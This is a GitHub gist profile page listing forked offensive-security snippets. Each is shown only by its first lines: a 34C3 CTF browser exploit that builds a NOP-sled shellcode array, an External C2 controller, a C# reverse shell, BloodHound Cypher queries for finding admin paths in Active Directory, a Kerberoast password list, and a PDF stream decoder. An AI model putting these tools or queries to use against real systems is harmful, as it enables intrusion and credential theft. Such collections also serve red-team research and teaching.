Skip to content

Instantly share code, notes, and snippets.

View raystyle's full-sized avatar

ray raystyle

48 followers · 23 following
  • beijing
View GitHub Profile
@raystyle
raystyle / exploit.html
Created October 8, 2018 05:33 — forked from itszn/exploit.html
34c3ctf V9 Exploit
<script>
function gc() { for (let i = 0; i < 0x10; i++) { new ArrayBuffer(0x1000000); } }
var sc = [];
for (var i=0; i<0x480; i++) {
sc.push(0x90);
}
//sc.push(0xcc);
//sc.push(0xeb);
//sc.push(0xfe);
@raystyle
raystyle / external_controller.py
Created October 19, 2018 03:45 — forked from xpn/external_controller.py
import socket
import struct
import time
class ExternalC2Controller:
def __init__(self, port):
self.port = port
def encodeFrame(self, data):
return struct.pack("<I", len(data)) + data
@raystyle
raystyle / Simple_Rev_Shell.cs
Created October 19, 2018 10:26
C# Simple Reverse Shell Code
using System;
using System.Text;
using System.IO;
using System.Diagnostics;
using System.ComponentModel;
using System.Linq;
using System.Net;
using System.Net.Sockets;
@raystyle
raystyle / Simple_Rev_Shell.cs
Created October 19, 2018 10:26
C# Simple Reverse Shell Code
using System;
using System.Text;
using System.IO;
using System.Diagnostics;
using System.ComponentModel;
using System.Linq;
using System.Net;
using System.Net.Sockets;
@raystyle
raystyle / rpc_dump_august.txt
Created October 24, 2018 08:17 — forked from masthoon/rpc_dump_rs4.txt
RPC interfaces dump August 2018
--------------------------------------------------------------------------------
<WinProcess "smss.exe" pid 520 at 0x5db0c50L>
64
[!!] Invalid rpcrt4 base: 0x0 vs 0x7ff868230000
--------------------------------------------------------------------------------
<WinProcess "csrss.exe" pid 776 at 0x5db0908L>
64
Interfaces :
Endpoints :
@raystyle
raystyle / abandonedInprocServer32.cs
Created October 31, 2018 06:41 — forked from matterpreter/abandonedInprocServer32.cs
using System;
using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Management;
namespace ComAbandonment
{
public class ComAbandonment
{
@raystyle
raystyle / gist:f3a5c645f6622b54490130ddcedf8ead
Created November 5, 2018 07:30 — forked from jeffmcjunkin/gist:7b4a67bb7dd0cfbfbd83768f3aa6eb12
Useful Cypher queries for BloodHound
---------------
MATCH (u:User)-[r:AdminTo|MemberOf*1..]->(c:Computer
RETURN u.name
That’ll return a list of users who have admin rights on at least one system either explicitly or through group membership
---------------
MATCH
(U:User)-[r:MemberOf|:AdminTo*1..]->(C:Computer)
@raystyle
raystyle / kerberoast_pws.xz
Last active November 19, 2018 06:35 — forked from edermi/kerberoast_pws.xz
edermi Kerberoast PW list (XZ format)
This file has been truncated, but you can view the full file.
View raw
@raystyle
raystyle / pdf_flatedecode.py
Created December 13, 2018 02:40 — forked from averagesecurityguy/pdf_flatedecode.py
Decompress FlateDecode Objects in PDF
#!/bin/bash
import re
import zlib
pdf = open("some_doc.pdf", "rb").read()
stream = re.compile(r'.*?FlateDecode.*?stream(.*?)endstream', re.S)
for s in stream.findall(pdf):
s = s.strip('\r\n')
try:
@raystyle
raystyle / windows-toolkit.md
Created December 27, 2018 03:26 — forked from jthuraisamy/windows-toolkit.md
Windows Toolkit

Windows Toolkit

Binary

Native Binaries

IDA Plugins Preferred Neutral Unreviewed